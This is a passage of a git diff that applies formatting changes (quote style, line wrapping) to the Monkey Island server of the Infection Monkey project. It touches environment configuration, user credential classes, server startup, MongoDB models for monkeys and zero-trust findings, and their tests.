StubEnvironmentConfig("test", "test", UserCreds("test_user", "test_secret")) super().__init__(config) _credentials_required = True @@ -131,7 +131,9 @@ class TestEnvironment(TestCase): env = TestEnvironment.EnvironmentCredentialsNotRequired() self._test_bool_env_method("_is_credentials_set_up", env, STANDARD_ENV, False) - def _test_bool_env_method(self, method_name: str, env: Environment, config: Dict, expected_result: bool): + def _test_bool_env_method( + self, method_name: str, env: Environment, config: Dict, expected_result: bool + ): env._config = EnvironmentConfig(config) method = getattr(env, method_name) if expected_result: diff --git a/monkey/monkey_island/cc/environment/test_environment_config.py b/monkey/monkey_island/cc/environment/test_environment_config.py index de941a6f3..d2ac052c7 100644 --- a/monkey/monkey_island/cc/environment/test_environment_config.py +++ b/monkey/monkey_island/cc/environment/test_environment_config.py @@ -9,17 +9,11 @@ from monkey_island.cc.environment.environment_config import EnvironmentConfig from monkey_island.cc.environment.user_creds import UserCreds -TEST_RESOURCES_DIR = os.path.join( - MONKEY_ISLAND_ABS_PATH, "cc", "testing", "environment" -) +TEST_RESOURCES_DIR = os.path.join(MONKEY_ISLAND_ABS_PATH, "cc", "testing", "environment") -WITH_CREDENTIALS = os.path.join( - TEST_RESOURCES_DIR, "server_config_with_credentials.json" -) +WITH_CREDENTIALS = os.path.join(TEST_RESOURCES_DIR, "server_config_with_credentials.json") NO_CREDENTIALS = os.path.join(TEST_RESOURCES_DIR, "server_config_no_credentials.json") -PARTIAL_CREDENTIALS = os.path.join( - TEST_RESOURCES_DIR, "server_config_partial_credentials.json" -) +PARTIAL_CREDENTIALS = os.path.join(TEST_RESOURCES_DIR, "server_config_partial_credentials.json") STANDARD_WITH_CREDENTIALS = os.path.join( TEST_RESOURCES_DIR, "server_config_standard_with_credentials.json" ) diff --git a/monkey/monkey_island/cc/environment/test_user_creds.py b/monkey/monkey_island/cc/environment/test_user_creds.py index 18c052526..93da16e24 100644 --- a/monkey/monkey_island/cc/environment/test_user_creds.py +++ b/monkey/monkey_island/cc/environment/test_user_creds.py @@ -4,19 +4,18 @@ from monkey_island.cc.environment.user_creds import UserCreds class TestUserCreds(TestCase): - def test_to_dict(self): user_creds = UserCreds() self.assertDictEqual(user_creds.to_dict(), {}) user_creds = UserCreds(username="Test") - 
self.assertDictEqual(user_creds.to_dict(), {'user': "Test"}) + self.assertDictEqual(user_creds.to_dict(), {"user": "Test"}) user_creds = UserCreds(password_hash="abc1231234") - self.assertDictEqual(user_creds.to_dict(), {'password_hash': "abc1231234"}) + self.assertDictEqual(user_creds.to_dict(), {"password_hash": "abc1231234"}) user_creds = UserCreds(username="Test", password_hash="abc1231234") - self.assertDictEqual(user_creds.to_dict(), {'user': "Test", 'password_hash': "abc1231234"}) + self.assertDictEqual(user_creds.to_dict(), {"user": "Test", "password_hash": "abc1231234"}) def test_to_auth_user(self): user_creds = UserCreds(username="Test", password_hash="abc1231234") diff --git a/monkey/monkey_island/cc/environment/user_creds.py b/monkey/monkey_island/cc/environment/user_creds.py index 7d6ca4962..98a23a14a 100644 --- a/monkey/monkey_island/cc/environment/user_creds.py +++ b/monkey/monkey_island/cc/environment/user_creds.py @@ -7,7 +7,6 @@ from monkey_island.cc.resources.auth.auth_user import User class UserCreds: - def __init__(self, username="", password_hash=""): self.username = username self.password_hash = password_hash @@ -18,9 +17,9 @@ class UserCreds: def to_dict(self) -> Dict: cred_dict = {} if self.username: - cred_dict.update({'user': self.username}) + cred_dict.update({"user": self.username}) if self.password_hash: - cred_dict.update({'password_hash': self.password_hash}) + cred_dict.update({"password_hash": self.password_hash}) return cred_dict def to_auth_user(self) -> User: @@ -29,10 +28,10 @@ class UserCreds: @staticmethod def get_from_dict(data_dict: Dict) -> UserCreds: creds = UserCreds() - if 'user' in data_dict: - creds.username = data_dict['user'] - if 'password_hash' in data_dict: - creds.password_hash = data_dict['password_hash'] + if "user" in data_dict: + creds.username = data_dict["user"] + if "password_hash" in data_dict: + creds.password_hash = data_dict["password_hash"] return creds @staticmethod diff --git a/monkey/monkey_island/cc/main.py b/monkey/monkey_island/cc/main.py index 211084565..bc7b8e283 100644 --- a/monkey/monkey_island/cc/main.py +++ b/monkey/monkey_island/cc/main.py @@ -37,8 +37,10 @@ def main(should_setup_only=False, server_config_filename=DEFAULT_SERVER_CONFIG_P env_singleton.initialize_from_file(server_config_filename) initialize_encryptor(env_singleton.env.get_config().data_dir_abs_path) - mongo_url = os.environ.get('MONGO_URL', env_singleton.env.get_mongo_url()) - bootloader_server_thread = Thread(target=BootloaderHttpServer(mongo_url).serve_forever, daemon=True) + mongo_url = os.environ.get("MONGO_URL", env_singleton.env.get_mongo_url()) + bootloader_server_thread = Thread( + target=BootloaderHttpServer(mongo_url).serve_forever, daemon=True + ) bootloader_server_thread.start() start_island_server(should_setup_only) @@ -47,15 +49,15 @@ def main(should_setup_only=False, server_config_filename=DEFAULT_SERVER_CONFIG_P def start_island_server(should_setup_only): - mongo_url = os.environ.get('MONGO_URL', env_singleton.env.get_mongo_url()) + mongo_url = os.environ.get("MONGO_URL", env_singleton.env.get_mongo_url()) wait_for_mongo_db_server(mongo_url) assert_mongo_db_version(mongo_url) populate_exporter_list() app = init_app(mongo_url) - crt_path = str(Path(MONKEY_ISLAND_ABS_PATH, 'cc', 'server.crt')) - key_path = str(Path(MONKEY_ISLAND_ABS_PATH, 'cc', 'server.key')) + crt_path = str(Path(MONKEY_ISLAND_ABS_PATH, "cc", "server.crt")) + key_path = str(Path(MONKEY_ISLAND_ABS_PATH, "cc", "server.key")) setup() @@ -64,20 +66,29 @@ def 
start_island_server(should_setup_only): return if env_singleton.env.is_debug(): - app.run(host='0.0.0.0', debug=True, ssl_context=(crt_path, key_path)) + app.run(host="0.0.0.0", debug=True, ssl_context=(crt_path, key_path)) else: - http_server = WSGIServer(('0.0.0.0', env_singleton.env.get_island_port()), app, - certfile=os.environ.get('SERVER_CRT', crt_path), - keyfile=os.environ.get('SERVER_KEY', key_path)) + http_server = WSGIServer( + ("0.0.0.0", env_singleton.env.get_island_port()), + app, + certfile=os.environ.get("SERVER_CRT", crt_path), + keyfile=os.environ.get("SERVER_KEY", key_path), + ) log_init_info() http_server.serve_forever() def log_init_info(): - logger.info('Monkey Island Server is running!') + logger.info("Monkey Island Server is running!") logger.info(f"version: {get_version()}") - logger.info('Listening on the following URLs: {}'.format( - ", ".join(["https://{}:{}".format(x, env_singleton.env.get_island_port()) for x in local_ip_addresses()]) + logger.info( + "Listening on the following URLs: {}".format( + ", ".join( + [ + "https://{}:{}".format(x, env_singleton.env.get_island_port()) + for x in local_ip_addresses() + ] + ) ) ) MonkeyDownload.log_executable_hashes() @@ -85,7 +96,7 @@ def log_init_info(): def wait_for_mongo_db_server(mongo_url): while not is_db_server_up(mongo_url): - logger.info('Waiting for MongoDB server on {0}'.format(mongo_url)) + logger.info("Waiting for MongoDB server on {0}".format(mongo_url)) time.sleep(1) @@ -99,11 +110,14 @@ def assert_mongo_db_version(mongo_url): server_version = get_db_version(mongo_url) if server_version < required_version: logger.error( - 'Mongo DB version too old. {0} is required, but got {1}'.format(str(required_version), str(server_version))) + "Mongo DB version too old. {0} is required, but got {1}".format( + str(required_version), str(server_version) + ) + ) sys.exit(-1) else: - logger.info('Mongo DB version OK. Got {0}'.format(str(server_version))) + logger.info("Mongo DB version OK. Got {0}".format(str(server_version))) -if __name__ == '__main__': +if __name__ == "__main__": main() diff --git a/monkey/monkey_island/cc/models/__init__.py b/monkey/monkey_island/cc/models/__init__.py index 87626c448..c668be7ae 100644 --- a/monkey/monkey_island/cc/models/__init__.py +++ b/monkey/monkey_island/cc/models/__init__.py @@ -3,6 +3,7 @@ from mongoengine import connect import monkey_island.cc.environment.environment_singleton as env_singleton from .command_control_channel import CommandControlChannel # noqa: F401 + # Order of importing matters here, for registering the embedded and referenced documents before using them. 
from .config import Config # noqa: F401 from .creds import Creds # noqa: F401 @@ -10,6 +11,8 @@ from .monkey import Monkey # noqa: F401 from .monkey_ttl import MonkeyTtl # noqa: F401 from .pba_results import PbaResults # noqa: F401 -connect(db=env_singleton.env.mongo_db_name, - host=env_singleton.env.mongo_db_host, - port=env_singleton.env.mongo_db_port) +connect( + db=env_singleton.env.mongo_db_name, + host=env_singleton.env.mongo_db_host, + port=env_singleton.env.mongo_db_port, +) diff --git a/monkey/monkey_island/cc/models/attack/attack_mitigations.py b/monkey/monkey_island/cc/models/attack/attack_mitigations.py index 0c38ecbeb..3df6b839d 100644 --- a/monkey/monkey_island/cc/models/attack/attack_mitigations.py +++ b/monkey/monkey_island/cc/models/attack/attack_mitigations.py @@ -12,7 +12,7 @@ class AttackMitigations(Document): COLLECTION_NAME = "attack_mitigations" technique_id = StringField(required=True, primary_key=True) - mitigations = ListField(EmbeddedDocumentField('Mitigation')) + mitigations = ListField(EmbeddedDocumentField("Mitigation")) @staticmethod def get_mitigation_by_technique_id(technique_id: str) -> Document: @@ -23,23 +23,29 @@ class AttackMitigations(Document): def add_mitigation(self, mitigation: CourseOfAction): mitigation_external_ref_id = MitreApiInterface.get_stix2_external_reference_id(mitigation) - if mitigation_external_ref_id.startswith('M'): + if mitigation_external_ref_id.startswith("M"): self.mitigations.append(Mitigation.get_from_stix2_data(mitigation)) def add_no_mitigations_info(self, mitigation: CourseOfAction): mitigation_external_ref_id = MitreApiInterface.get_stix2_external_reference_id(mitigation) - if mitigation_external_ref_id.startswith('T') and len(self.mitigations) == 0: + if mitigation_external_ref_id.startswith("T") and len(self.mitigations) == 0: mitigation_mongo_object = Mitigation.get_from_stix2_data(mitigation) - mitigation_mongo_object['description'] = mitigation_mongo_object['description'].splitlines()[0] - mitigation_mongo_object['url'] = '' + mitigation_mongo_object["description"] = mitigation_mongo_object[ + "description" + ].splitlines()[0] + mitigation_mongo_object["url"] = "" self.mitigations.append(mitigation_mongo_object) @staticmethod def mitigations_from_attack_pattern(attack_pattern: AttackPattern): - return AttackMitigations(technique_id=MitreApiInterface.get_stix2_external_reference_id(attack_pattern), - mitigations=[]) + return AttackMitigations( + technique_id=MitreApiInterface.get_stix2_external_reference_id(attack_pattern), + mitigations=[], + ) @staticmethod def dict_from_stix2_attack_patterns(stix2_dict: Dict[str, AttackPattern]): - return {key: AttackMitigations.mitigations_from_attack_pattern(attack_pattern) - for key, attack_pattern in stix2_dict.items()} + return { + key: AttackMitigations.mitigations_from_attack_pattern(attack_pattern) + for key, attack_pattern in stix2_dict.items() + } diff --git a/monkey/monkey_island/cc/models/attack/mitigation.py b/monkey/monkey_island/cc/models/attack/mitigation.py index 03c8bafef..3c096b618 100644 --- a/monkey/monkey_island/cc/models/attack/mitigation.py +++ b/monkey/monkey_island/cc/models/attack/mitigation.py @@ -12,7 +12,7 @@ class Mitigation(EmbeddedDocument): @staticmethod def get_from_stix2_data(mitigation: CourseOfAction): - name = mitigation['name'] - description = mitigation['description'] + name = mitigation["name"] + description = mitigation["description"] url = MitreApiInterface.get_stix2_external_reference_url(mitigation) return Mitigation(name=name, 
description=description, url=url) diff --git a/monkey/monkey_island/cc/models/command_control_channel.py b/monkey/monkey_island/cc/models/command_control_channel.py index 3aefef455..a055c4a66 100644 --- a/monkey/monkey_island/cc/models/command_control_channel.py +++ b/monkey/monkey_island/cc/models/command_control_channel.py @@ -7,5 +7,6 @@ class CommandControlChannel(EmbeddedDocument): src - Monkey Island's IP dst - Monkey's IP (in case of a proxy chain this is the IP of the last monkey) """ + src = StringField() dst = StringField() diff --git a/monkey/monkey_island/cc/models/config.py b/monkey/monkey_island/cc/models/config.py index cfe128111..f4af7b400 100644 --- a/monkey/monkey_island/cc/models/config.py +++ b/monkey/monkey_island/cc/models/config.py @@ -7,5 +7,6 @@ class Config(EmbeddedDocument): monkey_island.cc.services.config_schema. See https://mongoengine-odm.readthedocs.io/apireference.html#mongoengine.FieldDoesNotExist """ - meta = {'strict': False} + + meta = {"strict": False} pass diff --git a/monkey/monkey_island/cc/models/creds.py b/monkey/monkey_island/cc/models/creds.py index 61322362e..d0861846d 100644 --- a/monkey/monkey_island/cc/models/creds.py +++ b/monkey/monkey_island/cc/models/creds.py @@ -5,5 +5,6 @@ class Creds(EmbeddedDocument): """ TODO get an example of this data, and make it strict """ - meta = {'strict': False} + + meta = {"strict": False} pass diff --git a/monkey/monkey_island/cc/models/edge.py b/monkey/monkey_island/cc/models/edge.py index 78fb91d6e..bb4f8a2c6 100644 --- a/monkey/monkey_island/cc/models/edge.py +++ b/monkey/monkey_island/cc/models/edge.py @@ -3,7 +3,7 @@ from mongoengine import BooleanField, Document, DynamicField, ListField, ObjectI class Edge(Document): - meta = {'allow_inheritance': True} + meta = {"allow_inheritance": True} # SCHEMA src_node_id = ObjectIdField(required=True) diff --git a/monkey/monkey_island/cc/models/monkey.py b/monkey/monkey_island/cc/models/monkey.py index b0009a335..c375a3858 100644 --- a/monkey/monkey_island/cc/models/monkey.py +++ b/monkey/monkey_island/cc/models/monkey.py @@ -2,8 +2,17 @@ Define a Document Schema for the Monkey document. """ import ring -from mongoengine import (BooleanField, DateTimeField, Document, DoesNotExist, DynamicField, EmbeddedDocumentField, - ListField, ReferenceField, StringField) +from mongoengine import ( + BooleanField, + DateTimeField, + Document, + DoesNotExist, + DynamicField, + EmbeddedDocumentField, + ListField, + ReferenceField, + StringField, +) from common.cloud import environment_names from monkey_island.cc.server_utils.consts import DEFAULT_MONKEY_TTL_EXPIRY_DURATION_IN_SECONDS @@ -21,10 +30,11 @@ class Monkey(Document): * The logic section defines complex questions we can ask about a single document which are asked multiple times, somewhat like an API. 
""" + # SCHEMA guid = StringField(required=True) - config = EmbeddedDocumentField('Config') - creds = ListField(EmbeddedDocumentField('Creds')) + config = EmbeddedDocumentField("Config") + creds = ListField(EmbeddedDocumentField("Creds")) dead = BooleanField() description = StringField() hostname = StringField() @@ -45,9 +55,13 @@ class Monkey(Document): command_control_channel = EmbeddedDocumentField(CommandControlChannel) # Environment related fields - environment = StringField(default=environment_names.Environment.UNKNOWN.value, - choices=environment_names.ALL_ENVIRONMENTS_NAMES) - aws_instance_id = StringField(required=False) # This field only exists when the monkey is running on an AWS + environment = StringField( + default=environment_names.Environment.UNKNOWN.value, + choices=environment_names.ALL_ENVIRONMENTS_NAMES, + ) + aws_instance_id = StringField( + required=False + ) # This field only exists when the monkey is running on an AWS # instance. See https://github.com/guardicore/monkey/issues/426. @@ -61,7 +75,7 @@ class Monkey(Document): @staticmethod # See https://www.python.org/dev/peps/pep-0484/#forward-references - def get_single_monkey_by_guid(monkey_guid) -> 'Monkey': + def get_single_monkey_by_guid(monkey_guid) -> "Monkey": try: return Monkey.objects.get(guid=monkey_guid) except DoesNotExist as ex: @@ -70,7 +84,7 @@ class Monkey(Document): @staticmethod def get_latest_modifytime(): if Monkey.objects.count() > 0: - return Monkey.objects.order_by('-modifytime').first().modifytime + return Monkey.objects.order_by("-modifytime").first().modifytime return None def is_dead(self): @@ -129,7 +143,7 @@ class Monkey(Document): Formats network info from monkey's model :return: dictionary with an array of IP's and a hostname """ - return {'ips': self.ip_addresses, 'hostname': self.hostname} + return {"ips": self.ip_addresses, "hostname": self.hostname} @ring.lru( expire=1 # data has TTL of 1 second. This is useful for rapid calls for report generation. diff --git a/monkey/monkey_island/cc/models/monkey_ttl.py b/monkey/monkey_island/cc/models/monkey_ttl.py index 3e456f244..e3025c250 100644 --- a/monkey/monkey_island/cc/models/monkey_ttl.py +++ b/monkey/monkey_island/cc/models/monkey_ttl.py @@ -27,15 +27,7 @@ class MonkeyTtl(Document): # https://stackoverflow.com/questions/55994379/mongodb-ttl-index-doesnt-delete-expired-documents. 
return MonkeyTtl(expire_at=datetime.utcnow() + timedelta(seconds=expiry_in_seconds)) - meta = { - 'indexes': [ - { - 'name': 'TTL_index', - 'fields': ['expire_at'], - 'expireAfterSeconds': 0 - } - ] - } + meta = {"indexes": [{"name": "TTL_index", "fields": ["expire_at"], "expireAfterSeconds": 0}]} expire_at = DateTimeField() diff --git a/monkey/monkey_island/cc/models/test_monkey.py b/monkey/monkey_island/cc/models/test_monkey.py index 7860de20e..404078c27 100644 --- a/monkey/monkey_island/cc/models/test_monkey.py +++ b/monkey/monkey_island/cc/models/test_monkey.py @@ -13,16 +13,12 @@ logger = logging.getLogger(__name__) class TestMonkey: - @pytest.mark.usefixtures(FixtureEnum.USES_DATABASE) def test_is_dead(self): # Arrange alive_monkey_ttl = MonkeyTtl.create_ttl_expire_in(30) alive_monkey_ttl.save() - alive_monkey = Monkey( - guid=str(uuid.uuid4()), - dead=False, - ttl_ref=alive_monkey_ttl.id) + alive_monkey = Monkey(guid=str(uuid.uuid4()), dead=False, ttl_ref=alive_monkey_ttl.id) alive_monkey.save() # MIA stands for Missing In Action @@ -69,12 +65,12 @@ class TestMonkey: @pytest.mark.usefixtures(FixtureEnum.USES_DATABASE) def test_get_os(self): - linux_monkey = Monkey(guid=str(uuid.uuid4()), - description="Linux shay-Virtual-Machine 4.15.0-50-generic #54-Ubuntu") - windows_monkey = Monkey(guid=str(uuid.uuid4()), - description="Windows bla bla bla") - unknown_monkey = Monkey(guid=str(uuid.uuid4()), - description="bla bla bla") + linux_monkey = Monkey( + guid=str(uuid.uuid4()), + description="Linux shay-Virtual-Machine 4.15.0-50-generic #54-Ubuntu", + ) + windows_monkey = Monkey(guid=str(uuid.uuid4()), description="Windows bla bla bla") + unknown_monkey = Monkey(guid=str(uuid.uuid4()), description="bla bla bla") linux_monkey.save() windows_monkey.save() unknown_monkey.save() @@ -85,32 +81,35 @@ class TestMonkey: @pytest.mark.usefixtures(FixtureEnum.USES_DATABASE) def test_get_tunneled_monkeys(self): - linux_monkey = Monkey(guid=str(uuid.uuid4()), - description="Linux shay-Virtual-Machine") - windows_monkey = Monkey(guid=str(uuid.uuid4()), - description="Windows bla bla bla", - tunnel=linux_monkey) - unknown_monkey = Monkey(guid=str(uuid.uuid4()), - description="bla bla bla", - tunnel=windows_monkey) + linux_monkey = Monkey(guid=str(uuid.uuid4()), description="Linux shay-Virtual-Machine") + windows_monkey = Monkey( + guid=str(uuid.uuid4()), description="Windows bla bla bla", tunnel=linux_monkey + ) + unknown_monkey = Monkey( + guid=str(uuid.uuid4()), description="bla bla bla", tunnel=windows_monkey + ) linux_monkey.save() windows_monkey.save() unknown_monkey.save() tunneled_monkeys = Monkey.get_tunneled_monkeys() - test = bool(windows_monkey in tunneled_monkeys - and unknown_monkey in tunneled_monkeys - and linux_monkey not in tunneled_monkeys - and len(tunneled_monkeys) == 2) + test = bool( + windows_monkey in tunneled_monkeys + and unknown_monkey in tunneled_monkeys + and linux_monkey not in tunneled_monkeys + and len(tunneled_monkeys) == 2 + ) assert test @pytest.mark.usefixtures(FixtureEnum.USES_DATABASE) def test_get_label_by_id(self): hostname_example = "a_hostname" ip_example = "1.1.1.1" - linux_monkey = Monkey(guid=str(uuid.uuid4()), - description="Linux shay-Virtual-Machine", - hostname=hostname_example, - ip_addresses=[ip_example]) + linux_monkey = Monkey( + guid=str(uuid.uuid4()), + description="Linux shay-Virtual-Machine", + hostname=hostname_example, + ip_addresses=[ip_example], + ) linux_monkey.save() logger.debug(id(Monkey.get_label_by_id)) diff --git 
a/monkey/monkey_island/cc/models/zero_trust/event.py b/monkey/monkey_island/cc/models/zero_trust/event.py index d1a0001af..727ec9a2a 100644 --- a/monkey/monkey_island/cc/models/zero_trust/event.py +++ b/monkey/monkey_island/cc/models/zero_trust/event.py @@ -15,6 +15,7 @@ class Event(EmbeddedDocument): * The logic section defines complex questions we can ask about a single document which are asked multiple times, or complex action we will perform - somewhat like an API. """ + # SCHEMA timestamp = DateTimeField(required=True) title = StringField(required=True) @@ -26,12 +27,7 @@ class Event(EmbeddedDocument): def create_event(title, message, event_type, timestamp=None): if not timestamp: timestamp = datetime.now() - event = Event( - timestamp=timestamp, - title=title, - message=message, - event_type=event_type - ) + event = Event(timestamp=timestamp, title=title, message=message, event_type=event_type) event.validate(clean=True) diff --git a/monkey/monkey_island/cc/models/zero_trust/finding.py b/monkey/monkey_island/cc/models/zero_trust/finding.py index f65d39af7..7ddf643fe 100644 --- a/monkey/monkey_island/cc/models/zero_trust/finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/finding.py @@ -28,8 +28,9 @@ class Finding(Document): * The logic section defines complex questions we can ask about a single document which are asked multiple times, or complex action we will perform - somewhat like an API. """ + # http://docs.mongoengine.org/guide/defining-documents.html#document-inheritance - meta = {'allow_inheritance': True} + meta = {"allow_inheritance": True} # SCHEMA test = StringField(required=True, choices=zero_trust_consts.TESTS) diff --git a/monkey/monkey_island/cc/models/zero_trust/monkey_finding.py b/monkey/monkey_island/cc/models/zero_trust/monkey_finding.py index 479b9b244..9fd1805f4 100644 --- a/monkey/monkey_island/cc/models/zero_trust/monkey_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/monkey_finding.py @@ -12,9 +12,7 @@ class MonkeyFinding(Finding): details = LazyReferenceField(MonkeyFindingDetails, required=True) @staticmethod - def save_finding(test: str, - status: str, - detail_ref: MonkeyFindingDetails) -> MonkeyFinding: + def save_finding(test: str, status: str, detail_ref: MonkeyFindingDetails) -> MonkeyFinding: finding = MonkeyFinding(test=test, status=status, details=detail_ref) finding.save() return finding diff --git a/monkey/monkey_island/cc/models/zero_trust/scoutsuite_finding.py b/monkey/monkey_island/cc/models/zero_trust/scoutsuite_finding.py index 9e36e46c5..174a68db7 100644 --- a/monkey/monkey_island/cc/models/zero_trust/scoutsuite_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/scoutsuite_finding.py @@ -12,9 +12,9 @@ class ScoutSuiteFinding(Finding): details = LazyReferenceField(ScoutSuiteFindingDetails, required=True) @staticmethod - def save_finding(test: str, - status: str, - detail_ref: ScoutSuiteFindingDetails) -> ScoutSuiteFinding: + def save_finding( + test: str, status: str, detail_ref: ScoutSuiteFindingDetails + ) -> ScoutSuiteFinding: finding = ScoutSuiteFinding(test=test, status=status, details=detail_ref) finding.save() return finding diff --git a/monkey/monkey_island/cc/models/zero_trust/test_event.py b/monkey/monkey_island/cc/models/zero_trust/test_event.py index f4044c037..653be95ec 100644 --- a/monkey/monkey_island/cc/models/zero_trust/test_event.py +++ b/monkey/monkey_island/cc/models/zero_trust/test_event.py @@ -11,19 +11,15 @@ class TestEvent: _ = Event.create_event( title=None, # title required message="bla bla", 
- event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, ) with pytest.raises(ValidationError): _ = Event.create_event( - title="skjs", - message="bla bla", - event_type="Unknown" # Unknown event type + title="skjs", message="bla bla", event_type="Unknown" # Unknown event type ) # Assert that nothing is raised. _ = Event.create_event( - title="skjs", - message="bla bla", - event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK + title="skjs", message="bla bla", event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK ) diff --git a/monkey/monkey_island/cc/models/zero_trust/test_monkey_finding.py b/monkey/monkey_island/cc/models/zero_trust/test_monkey_finding.py index 56a4066e1..f7cf39d22 100644 --- a/monkey/monkey_island/cc/models/zero_trust/test_monkey_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/test_monkey_finding.py @@ -9,30 +9,36 @@ from monkey_island.cc.models.zero_trust.monkey_finding_details import MonkeyFind from monkey_island.cc.test_common.fixtures import FixtureEnum MONKEY_FINDING_DETAIL_MOCK = MonkeyFindingDetails() -MONKEY_FINDING_DETAIL_MOCK.events = ['mock1', 'mock2'] +MONKEY_FINDING_DETAIL_MOCK.events = ["mock1", "mock2"] class TestMonkeyFinding: - @pytest.mark.usefixtures(FixtureEnum.USES_DATABASE) def test_save_finding_validation(self): with pytest.raises(ValidationError): - _ = MonkeyFinding.save_finding(test="bla bla", - status=zero_trust_consts.STATUS_FAILED, - detail_ref=MONKEY_FINDING_DETAIL_MOCK) + _ = MonkeyFinding.save_finding( + test="bla bla", + status=zero_trust_consts.STATUS_FAILED, + detail_ref=MONKEY_FINDING_DETAIL_MOCK, + ) @pytest.mark.usefixtures(FixtureEnum.USES_DATABASE) def test_save_finding_sanity(self): assert len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION)) == 0 event_example = Event.create_event( - title="Event Title", message="event message", event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK) + title="Event Title", + message="event message", + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, + ) monkey_details_example = MonkeyFindingDetails() monkey_details_example.events.append(event_example) monkey_details_example.save() - MonkeyFinding.save_finding(test=zero_trust_consts.TEST_SEGMENTATION, - status=zero_trust_consts.STATUS_FAILED, - detail_ref=monkey_details_example) + MonkeyFinding.save_finding( + test=zero_trust_consts.TEST_SEGMENTATION, + status=zero_trust_consts.STATUS_FAILED, + detail_ref=monkey_details_example, + ) assert len(MonkeyFinding.objects(test=zero_trust_consts.TEST_SEGMENTATION)) == 1 assert len(MonkeyFinding.objects(status=zero_trust_consts.STATUS_FAILED)) == 1 diff --git a/monkey/monkey_island/cc/models/zero_trust/test_scoutsuite_finding.py b/monkey/monkey_island/cc/models/zero_trust/test_scoutsuite_finding.py index 723b428ff..07809cd90 100644 --- a/monkey/monkey_island/cc/models/zero_trust/test_scoutsuite_finding.py +++ b/monkey/monkey_island/cc/models/zero_trust/test_scoutsuite_finding.py @@ -10,19 +10,20 @@ from monkey_island.cc.services.zero_trust.test_common.scoutsuite_finding_data im from monkey_island.cc.test_common.fixtures import FixtureEnum MONKEY_FINDING_DETAIL_MOCK = MonkeyFindingDetails() -MONKEY_FINDING_DETAIL_MOCK.events = ['mock1', 'mock2'] +MONKEY_FINDING_DETAIL_MOCK.events = ["mock1", "mock2"] SCOUTSUITE_FINDING_DETAIL_MOCK = ScoutSuiteFindingDetails() SCOUTSUITE_FINDING_DETAIL_MOCK.scoutsuite_rules = [] class TestScoutSuiteFinding: - @pytest.mark.usefixtures(FixtureEnum.USES_DATABASE) def 
test_save_finding_validation(self): with pytest.raises(ValidationError): - _ = ScoutSuiteFinding.save_finding(test=zero_trust_consts.TEST_SEGMENTATION, - status="bla bla", - detail_ref=SCOUTSUITE_FINDING_DETAIL_MOCK) + _ = ScoutSuiteFinding.save_finding( + test=zero_trust_consts.TEST_SEGMENTATION, + status="bla bla", + detail_ref=SCOUTSUITE_FINDING_DETAIL_MOCK, + ) @pytest.mark.usefixtures(FixtureEnum.USES_DATABASE) def test_save_finding_sanity(self): @@ -32,9 +33,11 @@ class TestScoutSuiteFinding: scoutsuite_details_example = ScoutSuiteFindingDetails() scoutsuite_details_example.scoutsuite_rules.append(rule_example) scoutsuite_details_example.save() - ScoutSuiteFinding.save_finding(test=zero_trust_consts.TEST_SEGMENTATION, - status=zero_trust_consts.STATUS_FAILED, - detail_ref=scoutsuite_details_example) + ScoutSuiteFinding.save_finding( + test=zero_trust_consts.TEST_SEGMENTATION, + status=zero_trust_consts.STATUS_FAILED, + detail_ref=scoutsuite_details_example, + ) assert len(ScoutSuiteFinding.objects(test=zero_trust_consts.TEST_SEGMENTATION)) == 1 assert len(ScoutSuiteFinding.objects(status=zero_trust_consts.STATUS_FAILED)) == 1 diff --git a/monkey/monkey_island/cc/resources/T1216_pba_file_download.py b/monkey/monkey_island/cc/resources/T1216_pba_file_download.py index ac52b77f8..0ac69df6d 100644 --- a/monkey/monkey_island/cc/resources/T1216_pba_file_download.py +++ b/monkey/monkey_island/cc/resources/T1216_pba_file_download.py @@ -12,6 +12,8 @@ class T1216PBAFileDownload(flask_restful.Resource): """ def get(self): - executable_file_name = 'T1216_random_executable.exe' - return send_from_directory(directory=os.path.join(MONKEY_ISLAND_ABS_PATH, 'cc', 'resources', 'pba'), - filename=executable_file_name) + executable_file_name = "T1216_random_executable.exe" + return send_from_directory( + directory=os.path.join(MONKEY_ISLAND_ABS_PATH, "cc", "resources", "pba"), + filename=executable_file_name, + ) diff --git a/monkey/monkey_island/cc/resources/__init__.py b/monkey/monkey_island/cc/resources/__init__.py index e593a854b..a37455d11 100644 --- a/monkey/monkey_island/cc/resources/__init__.py +++ b/monkey/monkey_island/cc/resources/__init__.py @@ -1 +1 @@ -__author__ = 'Barak' +__author__ = "Barak" diff --git a/monkey/monkey_island/cc/resources/attack/__init__.py b/monkey/monkey_island/cc/resources/attack/__init__.py index 98867ed4d..4dc53e2ca 100644 --- a/monkey/monkey_island/cc/resources/attack/__init__.py +++ b/monkey/monkey_island/cc/resources/attack/__init__.py @@ -1 +1 @@ -__author__ = 'VakarisZ' +__author__ = "VakarisZ" diff --git a/monkey/monkey_island/cc/resources/attack/attack_config.py b/monkey/monkey_island/cc/resources/attack/attack_config.py index 532b1fb4f..570882dbd 100644 --- a/monkey/monkey_island/cc/resources/attack/attack_config.py +++ b/monkey/monkey_island/cc/resources/attack/attack_config.py @@ -10,11 +10,16 @@ __author__ = "VakarisZ" class AttackConfiguration(flask_restful.Resource): @jwt_required def get(self): - return current_app.response_class(json.dumps({"configuration": AttackConfig.get_config()}, - indent=None, - separators=(",", ":"), - sort_keys=False) + "\n", - mimetype=current_app.config['JSONIFY_MIMETYPE']) + return current_app.response_class( + json.dumps( + {"configuration": AttackConfig.get_config()}, + indent=None, + separators=(",", ":"), + sort_keys=False, + ) + + "\n", + mimetype=current_app.config["JSONIFY_MIMETYPE"], + ) @jwt_required def post(self): @@ -23,10 +28,10 @@ class AttackConfiguration(flask_restful.Resource): :return: Technique types dict 
